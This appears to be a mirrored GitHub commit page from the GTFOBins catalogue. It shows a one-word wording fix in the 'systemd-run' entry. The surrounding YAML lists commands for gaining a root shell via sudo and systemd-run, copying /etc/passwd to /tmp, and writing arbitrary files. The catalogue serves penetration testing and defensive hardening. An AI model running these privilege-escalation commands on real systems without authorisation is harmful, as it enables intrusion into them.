mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
[New GTFOBin] Systemd-run
This commit is contained in:
parent
437803e1b0
commit
b13745061f
@ -23,7 +23,7 @@ functions:
|
|||||||
- description: Gain a root shell using `sudo` and `systemd-run` with a pseudo-terminal (PTY).
|
- description: Gain a root shell using `sudo` and `systemd-run` with a pseudo-terminal (PTY).
|
||||||
code: sudo systemd-run --pty /bin/sh
|
code: sudo systemd-run --pty /bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
- description: Read the contents of a file and redirect the output to another file. In this case, the contents of `/etc/passwd` are copied to `/tmp/passwd`.
|
- description: Read the contents of a file and redirect the output to another file. In this example, the contents of `/etc/passwd` are copied to `/tmp/passwd`.
|
||||||
code: systemd-run /bin/sh -c "/bin/cat /etc/passwd > /tmp/passwd"
|
code: systemd-run /bin/sh -c "/bin/cat /etc/passwd > /tmp/passwd"
|
||||||
file-write:
|
file-write:
|
||||||
- description: Write data to a specific file. The filename should be absolute. In this example, the string "DATA" is written to `/tmp/file`.
|
- description: Write data to a specific file. The filename should be absolute. In this example, the string "DATA" is written to `/tmp/file`.
|
||||||
|
Loading…
Reference in New Issue
Block a user